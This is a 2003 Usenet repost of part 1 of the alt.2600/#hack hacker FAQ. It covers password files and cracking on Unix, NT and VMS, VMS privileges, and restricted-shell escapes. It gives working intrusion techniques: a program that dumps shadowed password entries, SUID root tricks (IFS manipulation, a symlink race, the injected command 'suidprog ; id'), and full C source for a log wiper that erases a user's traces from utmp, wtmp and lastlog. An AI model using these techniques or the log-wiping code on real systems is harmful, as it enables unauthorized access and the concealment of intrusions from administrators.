Path: senator-bedfellow.mit.edu!bloom-beacon.mit.edu!nntp.kreonet.re.kr!skynet.be!skynet.be!news-out.visi.com!hermes.visi.com!newsfeed1.easynews.com!easynews.com!easynews!newsfeed.news2me.com!newsfeed-west.nntpserver.com!hub1.meganetnews.com!nntpserver.com!news-west.rr.com!cyclone.kc.rr.com!cyclone3.kc.rr.com!news3.kc.rr.com!twister.rdc-kc.rr.com.POSTED!53ab2750!not-for-mail
From: Xaoc <
[email protected]>
Subject: alt.2600 FAQ 1 of 4
Newsgroups: alt.2600
Reply-To:
[email protected]
Lines: 2885
User-Agent: KNode/0.7.1
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8Bit
Message-ID: <
[email protected]>
Date: Wed, 22 Jan 2003 12:26:21 GMT
NNTP-Posting-Host: 65.28.40.254
X-Complaints-To:
[email protected]
X-Trace: twister.rdc-kc.rr.com 1043238381 65.28.40.254 (Wed, 22 Jan 2003 06:26:21 CST)
NNTP-Posting-Date: Wed, 22 Jan 2003 06:26:21 CST
Organization: RoadRunner
Xref: senator-bedfellow.mit.edu alt.2600:657106
[Note: I just post this stuff. I didn't write it. Please DO NOT reply to
this post quoting its entirety! Downloading costs many people real money.
H.]
--
[Further: There are other regularly posted files which you might care to
read. Namely: "The alt.2600 Survival Guide" (for new posters), "How To
Hack - Info for Newbies" and Visigoth's "Newbies: Links to Hacking (and
other) Information .." (both of which contain information that may also
be valuable to more experienced people), "Read this for CRACKS, WARES &
XXX PASSWORDS" expands on the information regarding cracks and software
in VisiGoth's text. "Free News Servers" and VisiGoth's "HowTo: Makeshift
Linux Network @ Home .." also contain information that may be of
interest. I attempt to post all of these texts about twice per week.
IMPORTANT NOTE: The "Survival Guide" is a supplement to this FAQ and
should be considered to be part of it. Violations of the etiquette
outlined therein are severely frowned upon by the alt.2600 regulars. H.]
Welcome to Version .014 of the alt.2600/#hack FAQ!
The purpose of this FAQ is to give you a general introduction
to the topics covered in alt.2600 and #hack. No document will
make you a hacker.
If you have a question regarding any of the topics covered in
the FAQ, please direct it to alt.2600. Please do not e-mail me
your questions; I do not have time to respond to each request
personally.
If your copy of the alt.2600/#hack FAQ does not end with the
letters EOT on a line by themselves, you do not have the entire
FAQ.
If you do not have the entire FAQ, retrieve it from one of
these sites:
Get it on FTP at:
rtfm.mit.edu /pub/usenet-by-group/alt.2600
mirrors.aol.com /pub/rtfm/usenet-by-group/alt.2600/
Get it on the World Wide Web at:
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.tar.gz
http://www.attrition.org/~voyager/faq.html
http://inflow.corky.net/hack
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The
alt.2600/#Hack F.A.Q.
Revision .014
A TNO Communications Production
by
Voyager
[email protected]
Greets go out to:
TNO, L.O.D., The Guild, r00t, L0pht Heavy Industries, TACD, PLA.
Cavalier, Disorder, Major, ThePublic, A-Flat, Aleph1, Alhambra,
Bogus Technician, Frosty, Glen Roberts, Harlequin, Hobbit, Kgee,
Lizzie Borden, Loq, Mad Poo Bandit, Marauder, Mudge, Mustard,
Outsider, Pill, Plexor, Presence, Rage, Rogue Agent, Route,
Simple Nomad, Theora, Tomes, Vidiot, Wozz and all of the other
happy zanies out there on the 'net.
When I picture a perfect reader, I always picture a
monster of courage and curiosity, also something
supple, cunning, cautious, a born adventurer and
discoverer...
-- Friedrich Nietzsche
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Section A: Computers
U A-01. How do I access the password file under Unix?
U A-02. How do I crack Unix passwords?
A-03. What is password shadowing?
U A-04. Where can I find the password file if it's shadowed?
A-05. What is NIS/yp?
U A-06. What are those weird characters after the comma in my passwd
file?
N A-07. How do I access the password file under Windows NT?
N A-08. How do I crack Windows NT passwords?
U A-09. How do I access the password file under VMS?
A-10. How do I crack VMS passwords?
A-11. What can be logged on a VMS system?
A-12. What privileges are available on a VMS system?
U A-13. How do I break out of a restrictive shell?
A-14. How do I gain root from a suid script or program?
A-15. How do I erase my presence from the system logs?
A-16. How do I change to directories with strange characters in them?
A-17. What is this system?
U A-18. What are the default accounts for XXX ?
A-19. What is a trojan/worm/virus/logic bomb?
A-20. How can I protect myself from viruses and such?
A-21. Where can I get more information about viruses?
A-22. What is Cryptoxxxxxxx?
A-23. What is PGP?
A-24. What is Tempest?
U A-25. How do I defeat copy protection?
N A-26. What are some available debuggers and disassemblers?
U A-27. How do I defeat a BIOS password?
A-28. What is the password for <encrypted file>?
U A-29. Is there any hope of a decompiler that would convert an
executable program into C/C++ code?
A-30. How does the MS-Windows password encryption work?
Section B: Data Networks
U B-01. How do I send fakemail?
B-02. How do I fake posts and control messages to Usenet?
B-03. How do I hack ChanOp on IRC?
B-04. How do I modify the IRC client to hide my real username?
U B-05. What is sniffing?
B-06. What is an Internet Outdial?
U B-07. What are some Internet Outdials?
B-08. What port is XXX on?
B-09. What is an anonymous remailer?
U B-10. What are the addresses of some anonymous remailers?
B-11. What is 127.0.0.1?
B-12. How do I post to a moderated newsgroup?
B-13. How do I post to Usenet via e-mail?
N B-14. What is a firewall?
N B-15. How do I attack a remote network across the Internet?
N B-16. What is a TCP sequence prediction attack?
Section C: Telephony
U C-01. What is a Red Box?
U C-02. How do I build a Red Box?
C-03. Where can I get a 6.5536Mhz crystal?
C-04. Which payphones will a Red Box work on?
U C-05. How do I make local calls with a Red Box?
C-06. What is a Blue Box?
C-07. Do Blue Boxes still work?
C-08. What is a Black Box?
C-09. What do all the colored boxes do?
U C-10. What is an ANAC number?
U C-11. What is the ANAC number for my area?
U C-12. What is a ringback number?
U C-13. What is the ringback number for my area?
C-14. What is a loop?
U C-15. What is a loop in my area?
U C-16. What is a CNA number?
U C-17. What is the telephone company CNA number for my area?
U C-18. What are some numbers that always ring busy?
U C-19. What are some numbers that temporarily disconnect phone service?
C-20. What is a Proctor Test Set?
C-21. What is a Proctor Test Set in my area?
U C-22. What is scanning?
C-23. Is scanning illegal?
N C-24. How can I make a lineman's handset?
C-25. Where can I purchase a lineman's handset?
U C-26. What are the DTMF frequencies?
U C-27. What are the frequencies of the telephone tones?
N C-28. What is the voltage used to ring a telephone?
U C-29. What are all of the * (LASS) codes?
C-30. What frequencies do cordless phones operate on?
C-31. What is Caller-ID?
C-32. How do I block Caller-ID?
N C-33. How do I defeat Caller-ID blocking?
U C-34. What is a PBX?
C-35. What is a VMB?
C-36. What are the ABCD tones for?
C-37. What are the International Direct Numbers?
N C-38. What are some telephone switches?
Section D: Cellular Telephony
D-01. What is a MTSO?
D-02. What is a NAM?
D-03. What is an ESN?
D-04. What is a MIN?
D-05. What is a SCN?
U D-06. What is a SIDH?
D-07. What are the forward/reverse channels?
Section E: Resources
U E-01. What are some ftp sites of interest to hackers?
E-02. What are some fsp sites of interest to hackers?
U E-03. What are some newsgroups of interest to hackers?
E-04. What are some telnet sites of interest to hackers?
E-05. What are some gopher sites of interest to hackers?
U E-06. What are some World wide Web (WWW) sites of interest to hackers?
E-07. What are some IRC channels of interest to hackers?
E-08. What are some BBS's of interest to hackers?
U E-09. What are some books of interest to hackers?
U E-10. What are some videos of interest to hackers?
U E-11. What are some mailing lists of interest to hackers?
E-12. What are some print magazines of interest to hackers?
E-13. What are some e-zines of interest to hackers?
E-14. What are some organizations of interest to hackers?
E-15. What are some radio programs of interest to hackers?
U E-16. What are other FAQ's of interest to hackers?
N E-17. What are some conferences of interest to hackers?
N E-18. What are some telephone numbers of interest to hackers?
U E-19. Where can I purchase a magnetic stripe reader/writer?
U E-20. What are the rainbow books and how can I get them?
Section F: 2600
F-01. What is alt.2600?
[ F-01a. Where is the alt.2600 Web site? H.]
F-02. What does "2600" mean?
F-03. Are there on-line versions of 2600 available?
F-04. I can't find 2600 at any bookstores. What can I do?
U F-05. Why does 2600 cost more to subscribe to than to buy at a
newsstand?
Section G: Miscellaneous
G-01. What does XXX stand for?
U G-02. How do I determine if I have a valid credit card number?
U G-03. What is the layout of data on magnetic stripe cards?
N G-04. What is pirate radio?
G-05. What are the ethics of hacking?
N G-06. Why did you write this FAQ?
G-07. Where can I get a copy of the alt.2600/#hack FAQ?
U == Updated since the last release of the alt.2600/#hack FAQ
N == New since the last release of the alt.2600/#hack FAQ
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-= Section A -- Computers =-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
A-01. How do I access the password file under Unix?
In standard Unix the password file is /etc/passwd. On a Unix system
with either NIS/yp or password shadowing, much of the password data may
be elsewhere. An entry in the password file consists of seven colon
delimited fields:
Username
Encrypted password (And optional password aging data)
User number
Group Number
GECOS Information
Home directory
Shell
]
] Sample entry from /etc/passwd:
]
] voyager:5fg63fhD3d5gh:9406:12:The Voyager:/home/voyager:/bin/bash
]
Broken down, this passwd file line shows:
Username: voyager
Encrypted password: 5fg63fhD3d5gh
User number: 9406
Group Number: 12
GECOS Information: The Voyager
Home directory: /home/voyager
Shell: /bin/bash
---------------------------------------------------------------------------
A-02. How do I crack Unix passwords?
Contrary to popular belief, Unix passwords cannot be decrypted. Unix
passwords are encrypted with a one way function. The login program
accepts the text you enter at the "Password:" prompt and then runs it
through a cryptographic algorithm. The results of that algorithm are
then compared against the encrypted form of your password stored in the
passwd file.
On a more technical level, the password that you enter is used as a key
to encrypt a 64-bit block of NULLs. The first seven bits of each
character are extracted to form a 56-bit key. This means that only
eight characters are significant in a standard Unix password. The
E-table is then modified using the salt, which is a 12-bit value,
coerced into the first two chars of the stored passwd. The salt's
purpose is to make precompiled passwordd lists and DES hardware chips
more time consuming to use. DES is then invoked for 25 iterations. The
64-bit output block and is then coerced into a 64-character alphabet
(A-Z,a-z,".","/"). This involves translations in which several
different values are represented by the same character, which is why
Unix passwords cannot be decrypted.
[Note from Dan Mellem: Under A-02, the FAQ lists the "64-character
alphabet" as "(A-Z,a-z,'.','/')"; the password also uses 0-9 (actual
order is "./0-9A-Za-z", I believe). H.]
Password cracking software uses wordlists. Each word in the wordlist is
encrypted using the algorithm described above and the salts from the
password file. The results are then compared to the encrypted form of
the target password.
The best cracking program for Unix passwords is currently Crack by
Alec Muffett. For PC-DOS, the best package to use is currently
CrackerJack. For the Macintosh, try Killer Cracker or Mac Krack.
---------------------------------------------------------------------------
A-03. What is password shadowing?
Password shadowing is a security system where the encrypted password
field of /etc/passwd is replaced with a special token and the
encrypted password is stored in a separate file which is not readable
by normal system users.
On older systems, password shadowing was often defeated by using a
program that made successive calls to getpwent() to obtain the entire
password file.
Example:
#include <pwd.h>
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
---------------------------------------------------------------------------
A-04. Where can I find the password file if it's shadowed?
Unix Path Token
--------------------------------------------------------------------
AIX 3 and AIX 4 /etc/security/passwd !
or /tcb/auth/files/<first letter #
of username>/<username>
A/UX 3.0s /tcb/files/auth/?/*
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix 3.2.x /tcb/auth/files/<first letter *
of username>/<username>
SunOS4.1+c2 /etc/security/passwd.adjunct ##username
SunOS 5.0 / Solaris 2.x /etc/shadow
<optional NIS+ private secure maps>
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb *
[Note from jaxom: Digital UNIX v4.0x (was OSF/1, now called Tru64 UNIX)
can run in C2 (ENHANCED) security mode. When this occurs, the shadow
password file is in:
/tcb/auth/files/<files letter of username>/<username>
/var/tcb/files/auth.db
These files contain an encrypted for of the password, normally using the
bigcrypt() algorithm. If you want to crack these, then its probably
easier to write a program looping over getprpwent() and extracting the
password (prpwd->ufld.fd_encrypt), the crypt algorithm
(prpwd->ufld.fd_oldcrypt) and then use that algorithm to generate the
appropriate passwords. Check a discussion on BUGTRAQ many, many moons
ago about the appropriateness of this hashing algorithm and the
potential weakness this has. H.]
---------------------------------------------------------------------------
A-05. What is NIS/yp?
NIS (Network Information System) in the current name for what was once
known as yp (Yellow Pages). The purpose of NIS is to allow many
machines on a network to share configuration information, including
password data. NIS is not designed to promote system security. If
your system uses NIS you will have a very short /etc/passwd file that
includes a line that looks like this:
+::0:0:::
To view the real password file use this command "ypcat passwd"
---------------------------------------------------------------------------
A-06. What are those weird characters after the comma in my passwd file?
The characters are password aging data. Password aging forces the
user to change passwords after a system administrator-specified period
of time. Password aging can also force a user to keep a password for
a certain number of weeks before changing it.
]
] Sample entry from /etc/passwd with password aging installed:
]
] voyager:5fg63fhD3d,M.z8:9406:12:The Voyager:/home/voyager:/bin/bash
]
Note the comma in the encrypted password field. The characters after
the comma are used by the password aging mechanism.
]
] Password aging characters from above example:
]
] M.z8
]
The four characters are interpreted as follows:
1: Maximum number of weeks a password can be used without changing.
2: Minimum number of weeks a password must be used before changing.
3&4: Last time password was changed, in number of weeks since 1970.
Three special cases should be noted:
If the first and second characters are set to '..' the user will be
forced to change his/her passwd the next time he/she logs in. The
passwd program will then remove the passwd aging characters, and the
user will not be subjected to password aging requirements again.
If the third and fourth characters are set to '..' the user will be
forced to change his/her passwd the next time he/she logs in. Password
aging will then occur as defined by the first and second characters.
If the first character (MAX) is less than the second character (MIN),
the user is not allowed to change his/her password. Only root can
change that users password.
It should also be noted that the su command does not check the password
aging data. An account with an expired password can be su'd to
without being forced to change the password.
Password Aging Codes
+------------------------------------------------------------------------+
| |
| Character: . / 0 1 2 3 4 5 6 7 8 9 A B C D E F G H |
| Number: 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 |
| |
| Character: I J K L M N O P Q R S T U V W X Y Z a b |
| Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |
| |
| Character: c d e f g h i j k l m n o p q r s t u v |
| Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |
| |
| Character: w x y z |
| Number: 60 61 62 63 |
| |
+------------------------------------------------------------------------+
---------------------------------------------------------------------------
A-07. How do I access the password file under Windows NT?
Windows NT stores encrypted password hashes in the Registry. RDISK
stores a compressed backup copy of the the password hashes is stored in
%SystemRoot%\repair\sam._.
If you can access the Registry you can use PWDump by Jeremy Allison to
view this data. The PWDump utility is freely available at
http://www.l0pht.com.
PWDump output consists of seven colon delimited fields:
Username
User number
Encrypted password
LAN Man Password Hash
Windows NT Password Hash
Full Name and Description
Home directory
]
] Sample passwd entry: (Split into two lines for readability)
]
] voyager:1000:30FA7B24C6108C5A8B4BCCA42D5816FF:
] B3823C82B43238D31BAF98FA4035255F:The Voyager, FAQ Author::
]
Broken down, this password entry shows:
Username: voyager
User number: 1000
Encrypted password: 5fg63fhD3d5gh
LAN Man Password Hash: 30FA7B24C6108C5A8B4BCCA42D5816FF
Windows NT Password Hash: B3823C82B43238D31BAF98FA4035255F
Full Name and Description: The Voyager, FAQ Author
Home directory :
---------------------------------------------------------------------------
A-08. How do I crack Windows NT passwords?
Windows NT passwords are encrypted with a one way function. This is
similar to the way that Unix stores passwords, except that the Microsoft
algorithm is significantly weaker.
Windows NT password can be cracked using wordlists. This is much the
same as attacking Unix passwords with word lists, except that Microsoft
passwords are much easier to crack.
In addition, Microsoft passwords can be brute forced. This means that
every password on the system can be retrieved.
The best cracking program for Windows NT passwords is currently
L0phtCrack by Mudge and Weld Pond. L0phtCrack is available at
http://www.l0pht.com.
---------------------------------------------------------------------------
A-09. How do I access the password file under VMS?
Under VMS, the password file is normally stored as
SYS$SYSTEM:SYSUAF.DAT. However, unlike traditional Unixen, most users
do not have access to read the password file.
[Note from Dan Mellem: the system file is SYSUAF.DAT.
Some administrators will move SYS$SYSTEM:SYSAUF.DAT, in an attempt to
increase security through obscurity. In this case, `DIR SYSAUF` or
`SHOW LOG SYSAUF` should point you to the new location of the file. H.]
---------------------------------------------------------------------------
A-10. How do I crack VMS passwords?
Write a program that uses the SYS$GETUAF functions to compare the
results of encrypted words against the encrypted data in SYSUAF.DAT.
Two such programs are known to exist, CHECK_PASSWORD and
GUESS_PASSWORD.
[Note from jaxom: These two can be looked at together. If you are
accessing the UAF through $GETUAI (NOT $GETUAF!), depending on what
privileges you hold determines what access you get:
o To change ANY entry in the UAF, you need SYSPRV or BYPASS.
o To modify entries in the UAF for those people in your group,
you need GRPPRV.
o If you do not have these privileges, no access is allowed.
To check an OpenVMS password, you need to extract the password and the
password salt from the UAF using $GETUAI and then create a hash based on
that salt using $HASH_PASSWORD. Compare that hash with the one from the
UAF to determine if the password is the same. There is a system
dictionary that can be used to get words instead of supplying your own.
This is stored in:
SYS$LIBRARY:VMS$PASSWORD_DICTIONARY.DATA
It's an indexed file, so you may have to read it in through RMS. H.]
---------------------------------------------------------------------------
A-11. What can be logged on a VMS system?
Virtually every aspect of the VMS system can be logged for
investigation. To determine the status of the accounting on your system
use the command SHOW ACCOUNTING. System accounting is a facility for
recording information about the use of the machine from a system
accounting perspective (resource logging such as CPU time, printer
usage, etc.), while system auditing is done with the aim of logging
information for the purpose of security. To enable accounting:
$ SET ACCOUNTING [/ENABLE=(Activity...)]
This enables accounting logging information to the accounting log
file SYS$MANAGER:ACCOUNTING.DAT. This also is used to close
the current log file and open a new one with a higher version
number.
The following activities can be logged:
BATCH Termination of a batch job
DETACHED Termination of a detached job
IMAGE Image execution
INTERACTIVE Interactive job termination
LOGIN_FAILURE Login failures
MESSAGE Users' messages
NETWORK Network job termination
PRINT Print Jobs
PROCESS Any terminated process
SUBPROCESS Termination of a subprocess
To enable security auditing use:
$ SET AUDIT [/ENABLE=(Activity...)]
The /ALARM qualifier is used to raise an alarm to all terminals approved
as security operators, which means that you need the SECURITY
privileges. You can determine your security auditing configuration
using $ SHOW AUDIT /ALL
The security auditor can be configured to log the following
activities:
ACL Access Control List requested events
AUTHORIZATION Modification to the system user
authorization file SYS$SYSTEM:SYSUAF.DAT
BREAKIN Attempted Break-ins
FILE_ACCESS File or global section access
INSTALL Occurrence of any INSTALL operations
LOGFAILURE Any login failures
LOGIN A login attempt from various sources
LOGOUT Logouts
MOUNT Mount or dismount requests
[Note from jaxom: You also need to be aware of OpenVMS Auditing. This
can log every single thing that you do. If the systems manager has this
switched on, all objects that you touch will be logged by the system.
H.]
---------------------------------------------------------------------------
A-12. What privileges are available on a VMS system?
ACNT Allows you to restrain accounting messages
ALLSPOOL Allows you to allocate spooled devices
ALTPRI Allot Priority. This allows you to set any priority
value
BUGCHK Allows you make bug check error log entries
BYPASS Enables you to disregard protections
CMEXEC/
CMKRNL Change to executive or kernel mode. These privileges
allow a process to execute optional routines with KERNEL
and EXECUTIVE access modes. CMKRNL is the most powerful
privilege on VMS as anything protected can be accessed
if you have this privilege. You must have these
privileges to gain access to the kernel data structures
directly.
DETACH This privilege allow you to create detached processes of
arbitrary UICs
[Note from jaxom: This privlege has been changed to IMPERSONATE as of
OpenVMS v7.0. H.]
DIAGNOSE With this privilege you can diagnose devices
EXQUOTA Allows you to exceed your disk quota
GROUP This privilege grants you permission to affect other
processes in the same rank
GRPNAM Allows you to insert group logical names into the group
logical names table.
GRPPRV Enables you to access system group objects through
system protection field
LOG_IO Allows you to issue logical input/output requests
MOUNT May execute the mount function
NETMBX Allows you to create network connections
OPER Allows you to perform operator functions
PFNMAP Allows you to map to specific physical pages
PHY_IO Allows you to perform physical input output requests
PRMCEB Can create permanent common event clusters
PRMGBL Allows you to create permanent global sections
PRMMBX Allows you to create permanent mailboxes
PSWAPM Allows you to change a processes swap mode
READALL Allows you read access to everything
SECURITY Enables you to perform security-related functions
SETPRV Enable all privileges
SHARE Allows you to access devices allocated to other users.
This is used to assign system mailboxes.
SHMEM Enables you to modify objects in shared memory
SYSGBL Allows you to create system wide permanent global
sections
SYSLCK Allows you to lock system wide resources
SYSNAM Allows you to insert in system logical names in the
names table.
SYSPRV If a process holds this privilege then it is the same as
a process holding the system user identification code.
TMPMBX Allows you to create temporary mailboxes
VOLPRO Enables you to override volume protection
WORLD When this is set you can affect other processes in the
world
[Note from Dan Mellem: ALTPRI is Alter Priority
SETPRV lets you set any privilege.
The FAQ's missing:
AUDIT may direct audit to system security audit log
DOWNGRADE may downgrade object secrecy
IMPORT may set classification for unlabeled object
UPGRADE may upgrade object integrity
These are all found in the high-security versions of VMS.
[Note from jaxom: This is potentially confusing. Only DOWNGRADE, IMPORT
and UPGRADE are used on SEVMS (Security Enhanced OpenVMS -- rated B2).
AUDIT is a valid permission on "standard" OpenVMS that allows the holder
to audit events and append records to the system audit file. This has
two parts, the audit server database, and the audit log file. These can
both be found in SYS$COMMON:[SYSMGR]. The audit server database is
called SYS$COMMON:[SYSMGR]VMS$AUDIT_SERVER.DAT and the audit log file
is SYS$COMMON:[SYSMGR]SECURITY.AUDIT$JOURNAL. H.]
Also, these privs are set under sys$system:authorize (be sure to set def
to sys$system first).
[Note from jaxom: This is not necessary if the logical SYSUAF is
defined. To make sure it is defined correctly, check the value of
SYSUAF:
$ SHOW LOGICAL SYSUAF
"SYSUAF" = "SYS$COMMON:[SYSEXE]SYSUAF" (LNM$SYSTEM_TABLE)
Notice that its defined in LNM$SYSTEM_TABLE. You will need SYSPRV to
change this value. If you want to change this definition, you will have
to type:
$ DEFINE /SYSTEM /EXECUTIVE SYSUAF DISK$DISK1:[DIR]SYSUAF.DAT
The /EXECUTIVE is important. This makes it into a trusted logical name
which is used by the OpenVMS operating system. If this isn't set as
/EXECUTIVE, then OpenVMS will NOT use the new definition.
If the logical name SYSUAF does not exist, then AUTHORIZE looks in the
current default directory for the file. If the file does not exist, it
then asks you whether or not you wish to create it. H.]
Under authorize you can also set /priv and /defpr
to ALL for everything or NONE for no privs. You can cancel any
particular priv. by adding "no" in front of the priv (e.g. $ authorize
joeblow/defpriv=nobypass).
[Note from jaxom: There is a difference between /DEFPRIVILEGE and
/PRIVILEGE. If a users privileges are set /DEFPRIVILEGE, those are the
privileges that you have when you log in. The privileges defined through
/PRIVILEGE are those marked as "authorised" in the $ SHOW PROCESS
/PRIVILEGE display. Note that granting a privilege in "authorised" is
NOT the same as granting a "default" privilege. You will have to use
$ SET PROCESS /PRIVILEGE=foo, or replace foo with ALL.
For more information on OpenVMS, look at the online OpenVMS
documentation set at:
http://www.openvms.digital.com:8080/
The most important documents are the OpenVMS Users Guide, the OpenVMS
Guide to System Security and the Systems Managers manuals (there are
two). Read the User Guide to get the basic OpenVMS concepts and then go
onto the other two to find out how OpenVMS and VMSclusters work.
Since Digital (now Compaq) has started the OpenVMS Hobbyist program, you
can get a free copy of OpenVMS as long as you have a supported VAX or
Alpha CPU and you are a member of DECUS. Check out:
http://www.montagar.com/
for more details.
To get a good sense of OpenVMS, check out the following:
Newsgroups:
comp.os.vms OpenVMS newsgroup
comp.sys.dec DEC (VAX and Alpha) hardware
vmsnet.* Everything to do with OpenVMS
Websites:
http://www.openvms.digital.com DEC's OpenVMS website
http://www.levitte.com/~ava Arne Vajhoej's collection
of OpenVMS resources.] H.]
To determine what privileges your process is running with issue the
command:
$ show proc/priv
---------------------------------------------------------------------------
A-13. How do I break out of a restrictive shell?
A restrictive shell is a shell that has been modified to allow you to do
fewer things than a normal shell would allow you to do. It may allow
you to run only certain programs. It may stop you from changing
directories. Many sites run their own restrictive shells to allow
limited use of their systems over the Internet. Restrictive shells
often make use of the restricted shell (rsh).
On poorly implemented restricted shells you can break out of the
restricted environment by running a program that features a shell
function. A good example is vi. Run vi and use this command:
:set shell=/bin/sh
then shell using this command:
:shell
Many menu based restricted shells will allow you to configure your user
environment, or to run programs that allow you to configure your user
environment. Look for configuration options that refer to executable
programs. If the program lets you define an editor, for example, try to
set your editor to "/bin/csh -i -f"
If you are not allowed to read files, try to open them inside the e-mail
program.
If you are not allowed to edit files, try to save that to file from the
e-mail program.
If your restricted shell prevents you from using the "cd" command, try
to FTP into your account and change directories. FTP can aso be used to
edit files by getting the file, editing it offline, and utting the net
file back online.
Like most hacking, trying things is often the most successful strategy.
---------------------------------------------------------------------------
A-14. How do I gain root from a SUID script or program?
1. Change IFS.
If the program calls any other programs using the system() function
call, you may be able to fool it by changing IFS. IFS is the Internal
Field Separator that the shell uses to delimit arguments.
If the program contains a line that looks like this:
system("/bin/date")
and you change IFS to '/' the shell will them interpret the
proceeding line as:
bin date
Now, if you have a program of your own in the path called "bin" the
suid program will run your program instead of /bin/date.
To change IFS, use this command:
IFS='/';export IFS # Bourne Shell
setenv IFS '/' # C Shell
export IFS='/' # Korn Shell
2. link the script to -i
Create a symbolic link named "-i" to the program. Running "-i"
will cause the interpreter shell (/bin/sh) to start up in interactive
mode. This only works on suid shell scripts.
Example:
% ln suid.sh -i
% -i
#
3. Exploit a race condition
Replace a symbolic link to the program with another program while the
kernel is loading /bin/sh.
Example:
nice -19 suidprog ; ln -s evilprog suidroot
4. Send bad input to the program.
Invoke the name of the program and a separate command on the same
command line.
Example:
suidprog ; id
---------------------------------------------------------------------------
A-15. How do I erase my presence from the system logs?
Edit utmp (usually /etc/utmp), wtmp (usually /usr/adm/wtmp), and lastlog
(usually /usr/adm/lastlog) These are not text files that can be edited
by hand with vi, you must use a program specifically written for this
purpose.
Example:
#include <sys/types.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else
printf("Error.\n");
}
---------------------------------------------------------------------------
A-16. How do I change to directories with strange characters in them?
These directories are often used by people trying to hide information,
most often warez (commercial software).
There are several things you can do to determine what these strange
characters are. One is to use the arguments to the ls command that
cause ls to give you more information:
From the man page for ls:
-F Causes directories to be marked with a trailing ``/'',
executable files to be marked with a trailing ``*'', and
symbolic links to be marked with a trailing ``@'' symbol.
-q Forces printing of non-graphic characters in filenames as the
character ``?''.
-b Forces printing of non-graphic characters in the \ddd
notation, in octal.
Perhaps the most useful tool is to simply do an "ls -al filename" to
save the directory of the remote ftp site as a file on your local
machine. Then you can do a "cat -t -v -e filename" to see exactly
what those bizarre little characters are.
From the man page for cat:
-v Causes non-printing characters (with the exception of tabs,
newlines, and form feeds) to be displayed. Control characters
are displayed as ^X (<Ctrl>x), where X is the key pressed with
the <Ctrl> key (for example, <Ctrl>m is displayed as ^M). The
<Del> character (octal 0177) is printed as ^?. Non-ASCII
characters (with the high bit set) are printed as M -x, where
x is the character specified by the seven low order bits.
-t Causes tabs to be printed as ^I and form feeds as ^L. This
option is ignored if the -v option is not specified.
-e Causes a ``$'' character to be printed at the end of each line
(prior to the new-line). This option is ignored if the -v
option is not set.
If the directory name includes a <SPACE> or a <TAB> you will need to
enclose the entire directory name in quotes. Example:
cd "..<TAB>"
On an IBM-PC, you may enter these special characters by holding down
the <ALT> key and entering the decimal value of the special character
on your numeric keypad. When you release the <ALT> key, the special
character should appear on your screen. An ASCII chart can be very
helpful.
Sometimes people will create directories with some of the standard
stty control characters in them, such as ^Z (suspend) or ^C (intr).
To get into those directories, you will first need to user stty to
change the control character in question to another character.
From the man page for stty:
Control assignments
control-character C
Sets control-character to C, where
control-character is erase, kill, intr
(interrupt), quit, eof, eol, swtch
(switch), start, stop or susp.
start and stop are available as possible control
